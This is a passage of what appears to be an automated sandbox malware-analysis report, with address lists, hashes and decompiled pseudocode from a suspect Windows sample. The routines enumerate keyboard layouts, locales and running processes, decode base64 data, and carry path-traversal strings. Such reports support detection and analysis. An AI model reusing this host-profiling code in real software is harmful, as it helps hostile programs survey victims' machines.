                                                                                0x00407385
                                                                                0x00407391
                                                                                0x0040739d
                                                                                0x004073b1
                                                                                0x004073b7
                                                                                0x004073bd
                                                                                0x004073c3
                                                                                0x004073c5
                                                                                0x004073cc
                                                                                0x004073d2
                                                                                0x004073d8
                                                                                0x004073de
                                                                                0x004073e4
                                                                                0x004073ea
                                                                                0x004073f0
                                                                                0x0040754f
                                                                                0x0040754f
                                                                                0x00407556
                                                                                0x00407558
                                                                                0x0040755e
                                                                                0x00407563
                                                                                0x00407572
                                                                                0x00407573
                                                                                0x00407575
                                                                                0x00407575
                                                                                0x0040757d
                                                                                0x00000000
                                                                                0x004073f6
                                                                                0x004073f6
                                                                                0x00407404
                                                                                0x00407404
                                                                                0x0040740d
                                                                                0x00407417
                                                                                0x0040741d
                                                                                0x0040742b
                                                                                0x0040742d
                                                                                0x0040742f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040743c
                                                                                0x0040743c
                                                                                0x00407440
                                                                                0x00407449
                                                                                0x0040744f
                                                                                0x004073fe
                                                                                0x00000000
                                                                                0x004073fe
                                                                                0x00000000
                                                                                0x00407451
                                                                                0x00407456
                                                                                0x0040745c
                                                                                0x00407468
                                                                                0x00407476
                                                                                0x00407479
                                                                                0x0040747f
                                                                                0x00407481
                                                                                0x00407483
                                                                                0x004074a2
                                                                                0x004074a5
                                                                                0x004074a7
                                                                                0x004074ad
                                                                                0x004074b2
                                                                                0x004074b8
                                                                                0x004074be
                                                                                0x004074be
                                                                                0x004074c4
                                                                                0x004074cb
                                                                                0x004074cd
                                                                                0x004074ec
                                                                                0x004074ef
                                                                                0x004074f1
                                                                                0x004074f7
                                                                                0x004074fc
                                                                                0x00407502
                                                                                0x00407508
                                                                                0x00407508
                                                                                0x0040750e
                                                                                0x00407515
                                                                                0x0040751d
                                                                                0x0040752d
                                                                                0x0040753c
                                                                                0x00407543
                                                                                0x00407549
                                                                                0x00407549
                                                                                0x00000000
                                                                                0x00407515
                                                                                0x004073f0
                                                                                0x00407258
                                                                                0x0040725b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040725d
                                                                                0x00407260
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407262
                                                                                0x00407265
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407265
                                                                                0x00000000
                                                                                0x00407204
                                                                                0x00000000
                                                                                0x004071bd
                                                                                0x004071a6
                                                                                0x00407170
                                                                                0x00407176
                                                                                0x0040717b
                                                                                0x00407131
                                                                                0x00000000
                                                                                0x00407131
                                                                                0x00407112
                                                                                0x00000000
                                                                                0x004070b2
                                                                                0x004070b2
                                                                                0x004070b4
                                                                                0x004070bf
                                                                                0x004070c4
                                                                                0x004070ca
                                                                                0x004070ca
                                                                                0x00000000
                                                                                0x004070b2
                                                                                0x004070b0
                                                                                0x00000000
                                                                                0x00407034
                                                                                0x00407037
                                                                                0x0040704f
                                                                                0x00407054
                                                                                0x00407058
                                                                                0x0040705c
                                                                                0x00407062
                                                                                0x00407068
                                                                                0x0040706e
                                                                                0x00407074
                                                                                0x0040707a
                                                                                0x00407080
                                                                                0x00407086
                                                                                0x0040708c
                                                                                0x00407043
                                                                                0x00407043
                                                                                0x00000000
                                                                                0x00407043
                                                                                0x0040703b
                                                                                0x0040703e
                                                                                0x00407041
                                                                                0x00407041
                                                                                0x00000000
                                                                                0x00407041

                                                                                APIs
                                                                                  • Part of subcall function 0040618F: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,00406345), ref: 004061BB
                                                                                • __fassign.LIBCMT ref: 00407211
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407385
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004073B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileTime$LocalPointerSystem__fassign
                                                                                • String ID: $/../$/..\$\../$\..\
                                                                                • API String ID: 3768451866-3209527955
                                                                                • Opcode ID: fa289e630cf5602a4e304044b06216e88885c6446b794952e7e5efe033d7718a
                                                                                • Instruction ID: d8a2291f13671c0d4e8ab039e63bf794020283fff128ae678da84d371ff2c4ee
                                                                                • Opcode Fuzzy Hash: fa289e630cf5602a4e304044b06216e88885c6446b794952e7e5efe033d7718a
                                                                                • Instruction Fuzzy Hash: 58F1B271D082549BDB25CF28C8847D97BF0AF19304F1845FAE849EB382D739AA81CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			E0041628C(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t39;
                                                                                				int _t43;
                                                                                				HKL* _t45;
                                                                                				int _t46;
                                                                                				void* _t63;
                                                                                				int _t65;
                                                                                				void* _t70;
                                                                                				void* _t82;
                                                                                				intOrPtr _t84;
                                                                                				void* _t85;
                                                                                				void* _t88;
                                                                                				signed int _t89;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                
                                                                                				_t82 = __edx;
                                                                                				_t92 = _t91 - 0x238;
                                                                                				_t89 = _t92 - 4;
                                                                                				_t39 =  *0x447674; // 0x4124c941
                                                                                				 *(_t89 + 0x238) = _t39 ^ _t89;
                                                                                				_push(0x18);
                                                                                				E00421975(E0043653D, __ebx, __edi, __esi);
                                                                                				_t84 = __ecx;
                                                                                				 *((intOrPtr*)(_t89 - 0x20)) = 0;
                                                                                				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t89 - 0x24)) = __ecx;
                                                                                				 *((char*)(__ecx)) = 0;
                                                                                				 *((intOrPtr*)(_t89 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t89 - 0x20)) = 1;
                                                                                				 *((intOrPtr*)(_t89 - 0x18)) = 0;
                                                                                				_t43 = GetKeyboardLayoutList(0, 0);
                                                                                				_t87 = _t43;
                                                                                				_t45 = LocalAlloc(0x40, _t43 << 2);
                                                                                				 *(_t89 - 0x14) = _t45;
                                                                                				_t46 = GetKeyboardLayoutList(_t43, _t45);
                                                                                				 *(_t89 - 0x1c) = _t46;
                                                                                				 *(_t89 - 0x10) = 0;
                                                                                				if(_t46 > 0) {
                                                                                					do {
                                                                                						GetLocaleInfoA( *( *(_t89 - 0x14) +  *(_t89 - 0x10) * 4) & 0x0000ffff, 2, _t89 + 0x38, 0x200);
                                                                                						_t96 =  *((intOrPtr*)(_t89 - 0x18));
                                                                                						if( *((intOrPtr*)(_t89 - 0x18)) == 0) {
                                                                                							_push(_t89 + 0x38);
                                                                                							_push(_t89 + 0x1c);
                                                                                							_t87 = E0040D337(0, _t84, _t87, __eflags);
                                                                                							 *((intOrPtr*)(_t89 - 4)) = 3;
                                                                                							E0040CFB8(_t84, _t56);
                                                                                						} else {
                                                                                							_push(" / ");
                                                                                							_push(_t89 + 0x1c);
                                                                                							_t63 = E0040D337(0, _t84, _t87, _t96);
                                                                                							 *((intOrPtr*)(_t89 - 4)) = 1;
                                                                                							_t65 = E0040D3C3(_t89 + 0x38, _t89, _t63, _t89 + 0x38);
                                                                                							_t92 = _t92 + 0x14;
                                                                                							_t87 = _t65;
                                                                                							 *((char*)(_t89 - 4)) = 2;
                                                                                							E0040CFB8(_t84, _t65);
                                                                                							E00402C34(_t89, 1, 0);
                                                                                						}
                                                                                						 *((char*)(_t89 - 4)) = 0;
                                                                                						E00402C34(_t89 + 0x1c, 1, 0);
                                                                                						 *((intOrPtr*)(_t89 - 0x18)) =  *((intOrPtr*)(_t89 - 0x18)) + 1;
                                                                                						E00427E30(_t89 + 0x38, 0, 0x200);
                                                                                						_t92 = _t92 + 0xc;
                                                                                						 *(_t89 - 0x10) =  *(_t89 - 0x10) + 1;
                                                                                					} while ( *(_t89 - 0x10) <  *(_t89 - 0x1c));
                                                                                				}
                                                                                				if( *(_t89 - 0x14) != 0) {
                                                                                					LocalFree( *(_t89 - 0x14));
                                                                                				}
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
                                                                                				_pop(_t85);
                                                                                				_pop(_t88);
                                                                                				_pop(_t70);
                                                                                				return E0041DEB4(_t84, _t70,  *(_t89 + 0x238) ^ _t89, _t82, _t85, _t88);
                                                                                			}


















                                                                                0x0041628c
                                                                                0x0041628d
                                                                                0x00416293
                                                                                0x00416297
                                                                                0x0041629e
                                                                                0x004162a4
                                                                                0x004162ab
                                                                                0x004162b0
                                                                                0x004162b4
                                                                                0x004162b7
                                                                                0x004162be
                                                                                0x004162c1
                                                                                0x004162c4
                                                                                0x004162c7
                                                                                0x004162cb
                                                                                0x004162d2
                                                                                0x004162d5
                                                                                0x004162db
                                                                                0x004162e3
                                                                                0x004162eb
                                                                                0x004162ee
                                                                                0x004162f4
                                                                                0x004162f7
                                                                                0x004162fc
                                                                                0x00416302
                                                                                0x00416318
                                                                                0x0041631e
                                                                                0x00416321
                                                                                0x00416364
                                                                                0x00416368
                                                                                0x00416370
                                                                                0x00416372
                                                                                0x00416379
                                                                                0x00416323
                                                                                0x00416326
                                                                                0x0041632b
                                                                                0x0041632c
                                                                                0x0041633a
                                                                                0x00416341
                                                                                0x00416346
                                                                                0x00416349
                                                                                0x0041634b
                                                                                0x0041634f
                                                                                0x0041635a
                                                                                0x0041635a
                                                                                0x00416384
                                                                                0x00416387
                                                                                0x0041638c
                                                                                0x00416399
                                                                                0x0041639e
                                                                                0x004163a1
                                                                                0x004163a7
                                                                                0x00416302
                                                                                0x004163b3
                                                                                0x004163b8
                                                                                0x004163b8
                                                                                0x004163c3
                                                                                0x004163cb
                                                                                0x004163cc
                                                                                0x004163cd
                                                                                0x004163e2

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004162AB
                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,00000018), ref: 004162D5
                                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004162E3
                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 004162EE
                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00416318
                                                                                • _memset.LIBCMT ref: 00416399
                                                                                  • Part of subcall function 0040D337: __EH_prolog3.LIBCMT ref: 0040D33E
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • LocalFree.KERNEL32(?), ref: 004163B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
                                                                                • String ID: /
                                                                                • API String ID: 680995659-4001269591
                                                                                • Opcode ID: 24e3056ab3286c1d5e428d839ccbfcda7330cb2e561a542cbd43c07e31e761fa
                                                                                • Instruction ID: 9ceeb7082f9f43b8e82a4085ab3dcf5438f48370fb9cca8a78e0fa4408784984
                                                                                • Opcode Fuzzy Hash: 24e3056ab3286c1d5e428d839ccbfcda7330cb2e561a542cbd43c07e31e761fa
                                                                                • Instruction Fuzzy Hash: 724163B190020DAFDB00DF95D985AEEB7B8FF08344F50012EF915E7281DB789A44CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E004163E3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t107;
                                                                                				void* _t119;
                                                                                				void* _t121;
                                                                                				void* _t123;
                                                                                				intOrPtr* _t124;
                                                                                				void* _t129;
                                                                                				void* _t138;
                                                                                				void* _t140;
                                                                                				void* _t142;
                                                                                				intOrPtr* _t143;
                                                                                				void* _t148;
                                                                                				void* _t159;
                                                                                				void* _t161;
                                                                                				void* _t163;
                                                                                				void* _t165;
                                                                                				signed int _t180;
                                                                                				signed int _t196;
                                                                                				void* _t210;
                                                                                				void* _t224;
                                                                                				intOrPtr _t228;
                                                                                				void* _t230;
                                                                                				void* _t233;
                                                                                				void* _t234;
                                                                                				intOrPtr _t239;
                                                                                				void* _t240;
                                                                                				void* _t241;
                                                                                				void* _t245;
                                                                                
                                                                                				_t245 = __eflags;
                                                                                				_t224 = __edx;
                                                                                				_push(0x298);
                                                                                				E00421A14(E0043719C, __ebx, __edi, __esi);
                                                                                				_t239 = 0xf;
                                                                                				 *(_t240 - 0x1f8) = 0;
                                                                                				 *((intOrPtr*)(_t240 - 0x1fc)) =  *((intOrPtr*)(_t240 + 8));
                                                                                				 *((intOrPtr*)(_t240 - 0x58)) = _t239;
                                                                                				 *((intOrPtr*)(_t240 - 0x5c)) = 0;
                                                                                				 *((char*)(_t240 - 0x6c)) = 0;
                                                                                				E00403A16(_t240 - 0x6c, _t245, 0x43e028, 0);
                                                                                				_push(_t240 - 0x2a4);
                                                                                				 *((intOrPtr*)(_t240 - 4)) = 1;
                                                                                				E0041687E(0, _t240 - 0x6c, 1, _t239, _t245);
                                                                                				E00402C34(_t240 - 0x6c, 1, 0);
                                                                                				 *((char*)(_t240 - 4)) = 4;
                                                                                				 *(_t240 - 0x1f0) = 0;
                                                                                				_t228 = 0;
                                                                                				 *(_t240 - 0x1ec) = 0x128;
                                                                                				 *((intOrPtr*)(_t240 - 0x3c)) = _t239;
                                                                                				 *((intOrPtr*)(_t240 - 0x40)) = 0;
                                                                                				 *((char*)(_t240 - 0x50)) = 0;
                                                                                				E00403A16(_t240 - 0x50, _t245, "----------", 0xa);
                                                                                				 *((char*)(_t240 - 4)) = 5;
                                                                                				_t107 = CreateToolhelp32Snapshot(2, 0);
                                                                                				 *(_t240 - 0x1f4) = _t107;
                                                                                				if(Process32First(_t107, _t240 - 0x1ec) != 0) {
                                                                                					while(Process32Next( *(_t240 - 0x1f4), _t240 - 0x1ec) != 0) {
                                                                                						if(_t228 !=  *((intOrPtr*)(_t240 - 0x1d4))) {
                                                                                							__eflags =  *(_t240 - 0x1f0);
                                                                                							if(__eflags != 0) {
                                                                                								 *(_t240 - 0x1f0) = 0;
                                                                                							}
                                                                                							_push( *((intOrPtr*)(_t240 - 0x1e4)));
                                                                                							_t179 = _t240 - 0x88;
                                                                                							_t119 = E00417463(0, _t240 - 0x88, _t224, _t228, _t239, __eflags);
                                                                                							 *((char*)(_t240 - 4)) = 0xd;
                                                                                							_t121 = E0040D3FA(_t240 - 0x88, _t240 - 0xa4, " [", _t119);
                                                                                							 *((char*)(_t240 - 4)) = 0xe;
                                                                                							_t123 = E0040D3C3(_t179, _t240 - 0xc0, _t121, "]");
                                                                                							_t241 = _t241 + 0x18;
                                                                                							_t230 = _t123;
                                                                                							 *((char*)(_t240 - 4)) = 0xf;
                                                                                							_t124 = _t240 - 0x1c8;
                                                                                							 *((intOrPtr*)(_t240 - 0x20)) = _t239;
                                                                                							 *((intOrPtr*)(_t240 - 0x24)) = 0;
                                                                                							 *((char*)(_t240 - 0x34)) = 0;
                                                                                							_t224 = _t124 + 1;
                                                                                							do {
                                                                                								_t180 =  *_t124;
                                                                                								_t124 = _t124 + 1;
                                                                                								__eflags = _t180;
                                                                                							} while (__eflags != 0);
                                                                                							E00403A16(_t240 - 0x34, __eflags, _t240 - 0x1c8, _t124 - _t224);
                                                                                							_push("- ");
                                                                                							_push(_t240 - 0x294);
                                                                                							 *((char*)(_t240 - 4)) = 0x10;
                                                                                							_t129 = E00416DEA(0, _t230, _t239, __eflags);
                                                                                							_push(" ");
                                                                                							_push(_t129);
                                                                                							_push(E00416DEA(0, _t230, _t239, __eflags));
                                                                                							_push(E00416F6B(0, _t240 - 0x34, _t230, _t239, __eflags));
                                                                                							E00415504(0, _t230, _t240, E00416F6B(0, _t230, _t230, _t239, __eflags));
                                                                                							__eflags = 1;
                                                                                							E00402C34(_t240 - 0x34, 1, 0);
                                                                                							E00402C34(_t240 - 0xc0, 1, 0);
                                                                                							E00402C34(_t240 - 0xa4, 1, 0);
                                                                                							 *((char*)(_t240 - 4)) = 5;
                                                                                							E00402C34(_t240 - 0x88, 1, 0);
                                                                                						} else {
                                                                                							_t249 =  *(_t240 - 0x1f0);
                                                                                							if( *(_t240 - 0x1f0) != 0) {
                                                                                								_t233 = 0;
                                                                                								__eflags = 0;
                                                                                								while(1) {
                                                                                									__eflags = _t233 -  *(_t240 - 0x1f0);
                                                                                									if(__eflags > 0) {
                                                                                										break;
                                                                                									}
                                                                                									_push(_t240 - 0x294);
                                                                                									E00416F6B(0, _t240 - 0x50, _t233, _t239, __eflags);
                                                                                									_t233 = _t233 + 1;
                                                                                								}
                                                                                								_push( *((intOrPtr*)(_t240 - 0x1e4)));
                                                                                								_t195 = _t240 - 0xc0;
                                                                                								_t138 = E00417463(0, _t240 - 0xc0, _t224, _t233, _t239, __eflags);
                                                                                								 *((char*)(_t240 - 4)) = 9;
                                                                                								_t140 = E0040D3FA(_t240 - 0xc0, _t240 - 0x88, " [", _t138);
                                                                                								 *((char*)(_t240 - 4)) = 0xa;
                                                                                								_t142 = E0040D3C3(_t195, _t240 - 0xa4, _t140, "]");
                                                                                								_t241 = _t241 + 0x18;
                                                                                								_t234 = _t142;
                                                                                								 *((char*)(_t240 - 4)) = 0xb;
                                                                                								_t143 = _t240 - 0x1c8;
                                                                                								 *((intOrPtr*)(_t240 - 0x20)) = _t239;
                                                                                								 *((intOrPtr*)(_t240 - 0x24)) = 0;
                                                                                								 *((char*)(_t240 - 0x34)) = 0;
                                                                                								_t224 = _t143 + 1;
                                                                                								do {
                                                                                									_t196 =  *_t143;
                                                                                									_t143 = _t143 + 1;
                                                                                									__eflags = _t196;
                                                                                								} while (__eflags != 0);
                                                                                								E00403A16(_t240 - 0x34, __eflags, _t240 - 0x1c8, _t143 - _t224);
                                                                                								_push("---------- ");
                                                                                								_push(_t240 - 0x294);
                                                                                								 *((char*)(_t240 - 4)) = 0xc;
                                                                                								_t148 = E00416DEA(0, _t234, _t239, __eflags);
                                                                                								_push(" ");
                                                                                								_push(_t148);
                                                                                								_push(E00416DEA(0, _t234, _t239, __eflags));
                                                                                								_push(E00416F6B(0, _t240 - 0x34, _t234, _t239, __eflags));
                                                                                								E00415504(0, _t234, _t240, E00416F6B(0, _t234, _t234, _t239, __eflags));
                                                                                								__eflags = 1;
                                                                                								E00402C34(_t240 - 0x34, 1, 0);
                                                                                								E00402C34(_t240 - 0xa4, 1, 0);
                                                                                								E00402C34(_t240 - 0x88, 1, 0);
                                                                                								_push(0);
                                                                                								_push(1);
                                                                                								_t210 = _t240 - 0xc0;
                                                                                							} else {
                                                                                								_push( *((intOrPtr*)(_t240 - 0x1e4)));
                                                                                								_t213 = _t240 - 0xa4;
                                                                                								_t159 = E00417463(0, _t240 - 0xa4, _t224, _t228, _t239, _t249);
                                                                                								 *((char*)(_t240 - 4)) = 6;
                                                                                								_t161 = E0040D3FA(_t240 - 0xa4, _t240 - 0x88, " [", _t159);
                                                                                								 *((char*)(_t240 - 4)) = 7;
                                                                                								_t163 = E0040D3C3(_t213, _t240 - 0x34, _t161, "]");
                                                                                								_t241 = _t241 + 0x18;
                                                                                								_t237 = _t163;
                                                                                								_push("---------- ");
                                                                                								_push(_t240 - 0x294);
                                                                                								 *((char*)(_t240 - 4)) = 8;
                                                                                								_t165 = E00416DEA(0, _t163, _t239, _t249);
                                                                                								_push(_t240 - 0x1c8);
                                                                                								_push(_t165);
                                                                                								_push(E00416DEA(0, _t237, _t239, _t249));
                                                                                								E00415504(0, _t237, _t240, E00416F6B(0, _t237, _t237, _t239, _t249));
                                                                                								E00402C34(_t240 - 0x34, 1, 0);
                                                                                								E00402C34(_t240 - 0x88, 1, 0);
                                                                                								_push(0);
                                                                                								_push(1);
                                                                                								_t210 = _t240 - 0xa4;
                                                                                							}
                                                                                							 *((char*)(_t240 - 4)) = 5;
                                                                                							E00402C34(_t210);
                                                                                							 *(_t240 - 0x1f0) =  *(_t240 - 0x1f0) + 1;
                                                                                						}
                                                                                						_t228 =  *((intOrPtr*)(_t240 - 0x1e4));
                                                                                					}
                                                                                				}
                                                                                				CloseHandle( *(_t240 - 0x1f4));
                                                                                				E00402C34(_t240 - 0x50, 1, 0);
                                                                                				 *((intOrPtr*)(_t240 - 4)) = 3;
                                                                                				_t229 =  *((intOrPtr*)(_t240 - 0x1fc));
                                                                                				_push(_t240 - 0x2a4);
                                                                                				E00416915(0,  *((intOrPtr*)(_t240 - 0x1fc)), _t239, __eflags);
                                                                                				_t95 = _t240 - 0x1f8;
                                                                                				 *_t95 =  *(_t240 - 0x1f8) | 0x00000001;
                                                                                				__eflags =  *_t95;
                                                                                				 *((char*)(_t240 - 4)) = 0;
                                                                                				E0040B593(_t240 - 0x2a4, 0, _t229);
                                                                                				return E00421A70(0, _t229, _t239);
                                                                                			}






























                                                                                0x004163e3
                                                                                0x004163e3
                                                                                0x004163e3
                                                                                0x004163ed
                                                                                0x004163f9
                                                                                0x004163fa
                                                                                0x00416409
                                                                                0x0041640f
                                                                                0x00416412
                                                                                0x00416415
                                                                                0x00416418
                                                                                0x00416426
                                                                                0x0041642a
                                                                                0x0041642d
                                                                                0x00416437
                                                                                0x0041643c
                                                                                0x0041644a
                                                                                0x00416450
                                                                                0x00416452
                                                                                0x0041645c
                                                                                0x0041645f
                                                                                0x00416462
                                                                                0x00416465
                                                                                0x0041646d
                                                                                0x00416471
                                                                                0x0041647f
                                                                                0x0041648d
                                                                                0x00416493
                                                                                0x004164b4
                                                                                0x00416677
                                                                                0x0041667d
                                                                                0x0041667f
                                                                                0x0041667f
                                                                                0x00416685
                                                                                0x0041668b
                                                                                0x00416691
                                                                                0x004166a3
                                                                                0x004166a7
                                                                                0x004166bc
                                                                                0x004166c0
                                                                                0x004166c5
                                                                                0x004166c8
                                                                                0x004166ca
                                                                                0x004166ce
                                                                                0x004166d4
                                                                                0x004166d7
                                                                                0x004166da
                                                                                0x004166dd
                                                                                0x004166e0
                                                                                0x004166e0
                                                                                0x004166e2
                                                                                0x004166e3
                                                                                0x004166e3
                                                                                0x004166f4
                                                                                0x004166ff
                                                                                0x00416704
                                                                                0x00416705
                                                                                0x00416709
                                                                                0x00416710
                                                                                0x00416715
                                                                                0x0041671d
                                                                                0x00416727
                                                                                0x00416731
                                                                                0x0041673a
                                                                                0x0041673f
                                                                                0x0041674c
                                                                                0x00416759
                                                                                0x00416766
                                                                                0x0041676a
                                                                                0x004164ba
                                                                                0x004164ba
                                                                                0x004164c0
                                                                                0x00416565
                                                                                0x00416565
                                                                                0x00416567
                                                                                0x00416567
                                                                                0x0041656d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00416575
                                                                                0x00416579
                                                                                0x0041657f
                                                                                0x0041657f
                                                                                0x00416582
                                                                                0x00416588
                                                                                0x0041658e
                                                                                0x004165a0
                                                                                0x004165a4
                                                                                0x004165b9
                                                                                0x004165bd
                                                                                0x004165c2
                                                                                0x004165c5
                                                                                0x004165c7
                                                                                0x004165cb
                                                                                0x004165d1
                                                                                0x004165d4
                                                                                0x004165d7
                                                                                0x004165da
                                                                                0x004165dd
                                                                                0x004165dd
                                                                                0x004165df
                                                                                0x004165e0
                                                                                0x004165e0
                                                                                0x004165f1
                                                                                0x004165fc
                                                                                0x00416601
                                                                                0x00416602
                                                                                0x00416606
                                                                                0x0041660d
                                                                                0x00416612
                                                                                0x0041661a
                                                                                0x00416624
                                                                                0x0041662e
                                                                                0x00416637
                                                                                0x0041663c
                                                                                0x00416649
                                                                                0x00416656
                                                                                0x0041665b
                                                                                0x0041665c
                                                                                0x0041665d
                                                                                0x004164c6
                                                                                0x004164c6
                                                                                0x004164cc
                                                                                0x004164d2
                                                                                0x004164e4
                                                                                0x004164e8
                                                                                0x004164fa
                                                                                0x004164fe
                                                                                0x00416503
                                                                                0x00416506
                                                                                0x0041650e
                                                                                0x00416513
                                                                                0x00416514
                                                                                0x00416518
                                                                                0x00416525
                                                                                0x00416526
                                                                                0x0041652e
                                                                                0x00416538
                                                                                0x00416544
                                                                                0x00416552
                                                                                0x00416557
                                                                                0x00416558
                                                                                0x0041655a
                                                                                0x0041655a
                                                                                0x00416663
                                                                                0x00416667
                                                                                0x0041666c
                                                                                0x0041666c
                                                                                0x0041676f
                                                                                0x0041676f
                                                                                0x00416493
                                                                                0x00416780
                                                                                0x0041678c
                                                                                0x00416791
                                                                                0x004167a9
                                                                                0x004167b5
                                                                                0x004167b6
                                                                                0x004167bb
                                                                                0x004167bb
                                                                                0x004167bb
                                                                                0x004167c8
                                                                                0x004167cb
                                                                                0x004167d7

                                                                                APIs
                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 004163ED
                                                                                  • Part of subcall function 0041687E: __EH_prolog3.LIBCMT ref: 00416885
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 00403A16: _memmove.LIBCMT ref: 00403A67
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00416471
                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00416485
                                                                                • Process32Next.KERNEL32 ref: 004164A0
                                                                                  • Part of subcall function 00416DEA: __EH_prolog3_catch.LIBCMT ref: 00416DF1
                                                                                  • Part of subcall function 00416F6B: __EH_prolog3_catch.LIBCMT ref: 00416F72
                                                                                • CloseHandle.KERNEL32(?), ref: 00416780
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_catchProcess32_memmove$CloseCreateFirstH_prolog3H_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                • String ID: ----------$----------
                                                                                • API String ID: 4185073159-2385812570
                                                                                • Opcode ID: 1064a9062219d0e46948724279d0d6575eb3925b2edd40008286560525a54c30
                                                                                • Instruction ID: d9db643d32ec5ca3ab43b03c3e7087237b562507825d7b5563a70fabea8574a0
                                                                                • Opcode Fuzzy Hash: 1064a9062219d0e46948724279d0d6575eb3925b2edd40008286560525a54c30
                                                                                • Instruction Fuzzy Hash: DBB19271905158AEEB24EB65DD46FEEBB78AF54308F1040AFF009B7181DAB85F84CB25
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0040F4F8
                                                                                • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,?,00410940,?), ref: 0040F50D
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040F515
                                                                                • _memmove.LIBCMT ref: 0040F56F
                                                                                • lstrcat.KERNEL32(0043E028,0043E028), ref: 0040F585
                                                                                • lstrcat.KERNEL32(0043E028,0043E028), ref: 0040F597
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                                                                • String ID: (C
                                                                                • API String ID: 943939369-3375610692
                                                                                • Opcode ID: d51a0901fab17331e65965b5d1a219e9628814bf6c4862e2e7d9282f13608ef4
                                                                                • Instruction ID: 99b573db7768662b943780cb123125b48d7d8c721c760c2ee258b453a8e7a8d5
                                                                                • Opcode Fuzzy Hash: d51a0901fab17331e65965b5d1a219e9628814bf6c4862e2e7d9282f13608ef4
                                                                                • Instruction Fuzzy Hash: 97310F75900218AFDB21DFA5DC849EEBBBDEF09344F54003AF909E7241EB349919CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

